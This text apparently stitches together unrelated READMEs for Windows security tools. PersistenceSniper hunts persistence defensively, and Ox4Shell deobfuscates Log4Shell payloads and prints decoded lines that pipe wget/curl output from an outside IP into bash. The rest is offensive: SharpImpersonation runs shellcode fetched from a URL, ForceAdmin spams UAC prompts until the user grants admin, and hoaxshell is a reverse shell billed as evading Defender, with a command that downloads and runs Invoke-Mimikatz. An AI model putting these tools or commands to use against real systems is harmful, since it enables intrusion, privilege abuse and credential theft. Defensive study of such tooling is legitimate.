This was a learning by doing project from my side. Well known techniques are used to built just another impersonation tool with some improvements in comparison to other public tools. The code base was taken from:
A blog post for the intruduction can be found here:
PS > PS C:\temp> SharpImpersonation.exe list
PS > PS C:\temp> SharpImpersonation.exe list elevated
PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>
PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
PersistenceSniper is a Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. The script is also available on Powershell Gallery. |
Why writing such a tool, you might ask. Well, for starters, I tried looking around and I did not find a tool which suited my particular use case, which was looking for known persistence techniques, automatically, across multiple machines, while also being able to quickly and easily parse and compare results. Sure, Sysinternals' Autoruns is an amazing tool and it's definitely worth using, but, given it outputs results in non-standard formats and can't be run remotely unless you do some shenanigans with its command line equivalent, I did not find it a good fit for me. Plus, some of the techniques I implemented so far in PersistenceSniper have not been implemented into Autoruns yet, as far as I know. Anyway, if what you need is an easy to use, GUI based tool with lots of already implemented features, Autoruns is the way to go, otherwise let PersistenceSniper have a shot, it won't miss it :)
Using PersistenceSniper is as simple as:
PS C:\> git clone https://github.com/last-byte/PersistenceSniper
PS C:\> Import-Module .\PersistenceSniper\PersistenceSniper\PersistenceSniper.psd1
PS C:\> Find-AllPersistence
If you need a detailed explanation of how to use the tool or which parameters are available and how they work, PersistenceSniper's Find-AllPersistence
supports Powershell's help features, so you can get detailed, updated help by using the following command after importing the module:
Get-Help -Name Find-AllPersistence -Full
PersistenceSniper's Find-AllPersistence
returns an array of objects of type PSCustomObject with the following properties:
PS C:\> Find-AllPersistence | Where-Object "Access Gained" -EQ "System"
Of course, being PersistenceSniper a Powershell-based tool, some cool tricks can be performed, like passing its output to Out-GridView
in order to have a GUI-based table to interact with.
As already introduced, Find-AllPersistence
outputs an array of Powershell Custom Objects. Each object has the following properties, which can be used to filter, sort and better understand the different techniques the function looks for:
Find-AllPersistence
without a -ComputerName
parameter, PersistenceSniper will run only on the local machine. Otherwise it will run on the remote computer(s) you specify;Let's face it, hunting for persistence techniques also comes with having to deal with a lot of false positives. This happens because, while some techniques are almost never legimately used, many indeed are by legit software which needs to autorun on system boot or user login.
This poses a challenge, which in many environments can be tackled by creating a CSV file containing known false positives. If your organization deploys systems using something like a golden image, you can run PersistenceSniper on a system you just created, get a CSV of the results and use it to filter out results on other machines. This approach comes with the following benefits:
Find-AllPersistence
comes with parameters allowing direct output of the findings to a CSV file, while also being able to take a CSV file as input and diffing the results.
PS C:\> Find-AllPersistence -DiffCSV false_positives.csv
Β
One cool way to use PersistenceSniper my mate Riccardo suggested is to use it in an incremental way: you could setup a Scheduled Task which runs every X hours, takes in the output of the previous iteration through the -DiffCSV
parameter and outputs the results to a new CSV. By keeping track of the incremental changes, you should be able to spot within a reasonably small time frame new persistences implanted on the machine you are monitoring.
The topic of persistence, especially on Windows machines, is one of those which see new discoveries basically every other week. Given the sheer amount of persistence techniques found so far by researchers, I am still in the process of implementing them. So far the following 31 techniques have been implemented successfully:
The techniques implemented in this script have already been published by skilled researchers around the globe, so it's right to give credit where credit's due. This project wouldn't be around if it weren't for:
I'd also like to give credits to my fellow mates at @APTortellini, in particular Riccardo Ancarani, for the flood of ideas that helped it grow from a puny text-oriented script to a full-fledged Powershell tool.
This project is under the CC0 1.0 Universal license. TL;DR: you can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission.
ForceAdmin is a c# payload builder, creating infinate UAC pop-ups until the user allows the program to be ran. The inputted commands are ran via powershell calling cmd.exe and should be using the batch syntax. Why use? Well some users have UAC set to always show, so UAC bypass techniques are not possible. However - this attack will force them to run as admin. Bypassing these settings.
For building on your own, the following NuGet packages are needed
Fody
: "Extensible tool for weaving .net assemblies."Costura.Fody
"Fody add-in for embedding references as resources."Microsoft.AspNet.WebApi.Client
"This package adds support for formatting and content negotiation to System.Net.Http. It includes support for JSON, XML, and form URL encoded data."You can download the latest tarball by clicking here or latest zipball by clicking here.
Download the project:
$ git clone https://github.com/catzsec/ForceAdmin.git
Enter the project folder
$ cd ForceAdmin
Run ForceAdmin:
$ dotnet run
Compile ForceAdmin:
$ dotnet publish -r win-x64 -c Release -o ./publish/
Any questions, errors or solutions, create an Issue in the Issues tab.
Deobfuscate Log4Shell payloads with ease.
Since the release of the Log4Shell vulnerability (CVE-2021-44228), many tools were created to obfuscate Log4Shell payloads, making the lives of security engineers a nightmare.
This tool intends to unravel the true contents of obfuscated Log4Shell payloads.
For example, consider the following obfuscated payload:
${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH[)]Tmw:a(:-da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:w@q.tjyo@-vL7thi26dIeB-HxjP:-.1}:38${Mh:n341x.Xl2L-8rHEeTW*=-lTNkvo:-90/}${sx3-9GTRv:-Cal}c$c${HR-ewA.mQ:g6@jJ:-z}3z${uY)u:7S2)P4ihH:M_S8fanL@AeX-PrW:-]}${S5D4[:qXhUBruo-QMr$1Bd-.=BmV:-}${_wjS:BIY0s:-Y_}p${SBKv-d9$5:-}Wx${Im:ajtV:-}AoL${=6wx-_HRvJK:-P}W${cR.1-lt3$R6R]x7-LomGH90)gAZ:NmYJx:-}h}
After running Ox4Shell, it would transform into an intuitive and readable form:
${jndi:ldap://1.1.1.1:3890/Calc$cz3z]Y_pWxAoLPWh}
This tool also aids to identify and decode base64 commands For example, consider the following obfuscated payload:
${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA==}
After running Ox4Shell, the tool reveals the attackerβs intentions:
${jndi:ldap://1.1.1.1:1389/Basic/(wget -O - http://185.250.148.157:8005/acc||curl -o - http://185.250.148.157:8005/acc)|/bin/bash
Ox4Shell
with a provided file (-f
) rather than an inline payload (-p
), because certain shell environments will escape important characters, therefore will yield inaccurate results.To run the tool simply:
~/Ox4Shell ΓΒ» python ox4shell.py --help
usage: ox4shell [-h] [-d] [-m MOCK] [--max-depth MAX_DEPTH] [--decode-base64] (-p PAYLOAD | -f FILE)
____ _ _ _____ _ _ _
/ __ \ | || | / ____| | | | |
| | | |_ _| || || (___ | |__ ___| | |
| | | \ \/ /__ _\___ \| '_ \ / _ \ | |
| |__| |> < | | ____) | | | | __/ | |
\____//_/\_\ |_||_____/|_| |_|\___|_|_|
Ox4Shell - Deobfuscate Log4Shell payloads with ease.
Created by https://oxeye.io
General:
-h, --help Show this help message and exit
-d, --debug Enable debug mode (default: False)
-m MOCK, --mock MOCK The location of the mock data JSON file that replaces certain values in the payload (default: mock.json)
--max-depth MAX_DEPTH
The ma ximum number of iteration to perform on a given payload (default: 150)
--decode-base64 Payloads containing base64 will be decoded (default: False)
Targets:
Choose which target payloads to run Ox4Shell on
-p PAYLOAD, --payload PAYLOAD
A single payload to deobfuscate, make sure to escape '$' signs (default: None)
-f FILE, --file FILE A file containing payloads delimited by newline (default: None)
The Log4j library has a few unique lookup functions, which allow users to look up environment variables, runtime information on the Java process, and so forth. This capability grants threat actors the ability to probe for specific information that can uniquely identify the compromised machine they targeted.
Ox4Shell uses the mock.json
file to insert common values into certain lookup function, for example, if the payload contains the value ${env:HOME}
, we can replace it with a custom mock value.
The default set of mock data provided is:
{
"hostname": "ip-127.0.0.1",
"env": {
"aws_profile": "staging",
"user": "ubuntu",
"pwd": "/opt/",
"path": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin"
},
"sys": {
"java.version": "16.0.2",
"user.name": "ubuntu"
},
"java": {
"version": "Java version 16.0.2",
"runtime": "OpenJDK Runtime Environment (build 1.8.0_181-b13) from Oracle Corporation",
"vm": "OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)",
"os": "Linux 5.10.47-linuxkit unknown, architecture: amd64-64",
"locale": "default locale: en_US, platform encoding: UTF-8",
"hw": "processors: 1, architecture: amd64-64"
}
}
As an example, we can deobfuscate the following payload using the Ox4Shell's mocking capability:
~/Ox4Shell >> python ox4shell.py -p "\${jndi:ldap://\${sys:java.version}.\${env:AWS_PROFILE}.malicious.server/a}"
${jndi:ldap://16.0.2.staging.malicious.server/a}
The source code for the project is licensed under the MIT license, which you can find in the LICENSE file.
hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions as it is solely based on http(s) traffic. The tool is easy to use, it generates it's own PowerShell payload and it supports encryption (ssl).
So far, it has been tested on fully updated Windows 11 Enterprise and Windows 10 Pro boxes (see video and screenshots).
Find more screenshots here.
git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py
sudo python3 hoaxshell.py -s <your_ip>
When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject on the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the "rawpayload" prompt command or start hoaxshell with the -r
argument. After the payload has been executed on the victim, you'll be able to run PowerShell commands against it.
# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>
The generated PowerShell payload will be longer in length because of an additional block of code that disables the ssl certificate validation.
In case you close your terminal accidentally, have a power outage or something, you can start hoaxshell in grab session mode, it will attempt to re-establish a session, given that the payload is still running on the victim machine.
sudo python3 hoaxshell.py -s <your_ip> -g
Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc).
The shell is going to hang if you execute a command that initiates an interactive session. Example:
# this command will execute succesfully and you will have no problem:
> powershell echo 'This is a test'
# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell
# In the same manner, you won't have a problem executing this:
> cmd /c dir /a
# But this will cause your hoaxshell to hang:
> cmd.exe
So, if you for example would like to run mimikatz throught hoaxshell you would need to invoke the commands:
hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'
Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell powershell context.
I am currently working on some auxiliary-type prompt commands to automate parts of host enumeration.